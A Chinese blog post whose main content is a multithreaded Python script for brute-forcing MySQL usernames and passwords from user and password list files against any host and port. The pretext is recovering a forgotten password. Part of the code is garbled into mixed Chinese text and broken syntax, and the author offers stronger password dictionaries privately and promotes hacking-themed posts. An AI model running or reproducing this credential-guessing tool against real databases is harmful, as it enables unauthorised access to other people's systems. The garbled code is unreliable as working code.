大家好,我是冰河~~
最近,很多伙伴对我说:“冰川,为什么你觉得你什么都做得到? Java、Python、大数据、分布式、微服务、系统架构、运输、渗透,平时是怎么学习的? 我:个人最好的学习方法是在平时的工作中,遇到问题就总结,积累解决问题的方案,及时检查不足,逐渐形成自己的方法论。
要知道,每个知识技能的积累都需要每天坚持下去。 只需称为—— 持之以恒,贵在坚持,就可以进行每天进步一点点。
小伙伴们如果觉得文章不错,点赞、收藏、评论,分享走一起呀,记得给冰河来个一键三连~~
进入了主题。 进入今天的主题吧。 今天下班我想回家登录MySQL数据库,不巧我忘了MySQL数据库的用户和密码。 我该怎么办? 是否要以安全模式登录? 我想这种普通的方法大家都能做到吧。 今天要写一个使用Python炸毁MySQL的工具,看看能否炸毁MySQL的用户和密码。
小伙伴们如果觉得文章不错,点赞、收藏、评论,分享走一起呀,记得给冰河来个一键三连~~
是的,我说做就做。 开始吧。
爆破脚本此次编写的爆破MySQL的Python脚本使用Python中的多线程编程,引入了MySQLdb模块。 运行时,脚本将接收以下五个参数:
要解密ip/domain :例如127.0.0.1端口:例如3306数据库:例如test用户名列表文件:例如user.txt文件密码列表文件:例如password. 下面是完整的脚本代码。
#!/usr/wsd hm/env python #-- coding : gbk-- #-coding : utf-8-- * # date 33602021/06/30 # createdby冰川sys, 读取timefromfunctoolsimportpartialfrommultiprocessing.dummyimportpoolasthreadpooltry : importmysqldbexcept ] mysqldb模块请从以下网站下载。 ' print '[ '! ] http://www.code good.com/archives/129 ' exit (def usage ) :打印' '-' * 50 ' '打印' tpythonMySQL暴力破解工具多线程twechatpublic (冰川技术(打印(t )冰川(打印) t ) ttime:2021-06-30 )打印(-) * 50 ) iflen ) sys.argen=6: print '用法3360 ' OS.path.basename (sys.argv [0] )解读ip/域端口数据库用户名列表密码列表' print '实例3360 ' OS.path.basename ' 127.0.0.13306 testuser.txtpass.txt ' SST ' password ) : ) MySQL数据库解密函数) db=nnon user,' password: ',password db=mysqldb.connect (host=host,user=(,user,password result.append (用户名: ' user 't密码:) password ) )。 exit(exceptmysqldb.error,msg: print )程序出错,错误信息为: ',msgpassfinally 3360 ifdb : db.close (if _ u 365292;
else: host = socket.gethostbyname(sys.argv[1]) userlist = [i.rstrip() for i in open(sys.argv[4])] passlist = [j.rstrip() for j in open(sys.argv[5])] print 'n[+] 目 标:%s n' % sys.argv[1] print '[+] 用户名:%d 条n' % len(userlist) print '[+] 密 码:%d 条n' % len(passlist) print '[!] 密码破解中,请稍候……n' result = [] for user in userlist: partial_user = partial(mysql_brute, user) pool = ThreadPool(10) pool.map(partial_user, passlist) pool.close() pool.join() if len(result) != 0: print '[+] MySQL密码破解成功!n' for x in {}.fromkeys(result).keys(): print x + 'n' else: print '[-] MySQL密码破解失败!n' print '[+] 破解完成,用时: %d 秒' % (time.time() - start_time)脚本编写完成后,运行,等待了一段时间,将我的MySQL的用户和密码完美的破解出来了。
这里需要注意的是:能不能破解出MySQL的用户和密码,那要看你的爆破字典是否足够强大了,说直白点,就是你的user.txt文件中的用户和password.txt文件中的密码是否足够齐全。
如果你想获取一个相对来说比较强大的爆破密码的字典文件,可以加我微信:sun_shine_lyz私聊获取。并且我自己也写了一个根据输入的位数生成密码字典的程序,大家也可以私聊我获取。
推荐书籍这次,也给大家推荐一些关注渗透方面的书籍吧。
《冰河的渗透实战笔记》首先,就是我最近写的这本《冰河的渗透实战笔记》,一本很不错的渗透实战电子书,绝大部分来源于冰河多年的渗透实战笔记。
下载地址:https://download.csdn.net/download/l1028386804/18830348
另外,再推荐两本,我之前深入研究过的并且很不错的书籍。
《IDA Pro代码破解揭秘》 《IDA Pro权威指南(第2版)》 写在最后如果你想进大厂,想升职加薪,或者对自己现有的工作比较迷茫,都可以私信我交流,希望我的一些经历能够帮助到大家~~
推荐阅读:
《全网最全性能优化总结!!(冰河吐血整理,建议收藏)》《三天撸完了MyBatis,各位随便问!!(冰河吐血整理,建议收藏)》《奉劝那些刚参加工作的学弟学妹们:要想进大厂,这些核心技能是你必须要掌握的!完整学习路线!!(建议收藏)》《奉劝那些刚参加工作的学弟学妹们:这些计算机与操作系统基础知识越早知道越好!万字长文太顶了!!(建议收藏)》《我用三天时间开发了一款老少皆宜的国民级游戏,支持播放音乐,现开放完整源代码和注释(建议收藏)!!》《我是全网最硬核的高并发编程作者,CSDN最值得关注的博主,大家同意吗?(建议收藏)》《毕业五年,从月薪3000到年薪百万,我掌握了哪些核心技能?(建议收藏)》《我入侵了隔壁妹子的Wifi,发现。。。(全程实战干货,建议收藏)》《千万不要轻易尝试“熊猫烧香”,这不,我后悔了!》《清明节偷偷训练“熊猫烧香”,结果我的电脑为熊猫“献身了”!》《7.3万字肝爆Java8新特性,我不信你能看完!(建议收藏)》《在业务高峰期拔掉服务器电源是一种怎样的体验?》《全网最全Linux命令总结!!(史上最全,建议收藏)》好了,今天就到这儿吧,小伙伴们点赞、收藏、评论,一键三连走起呀,我是冰河,我们下期见~~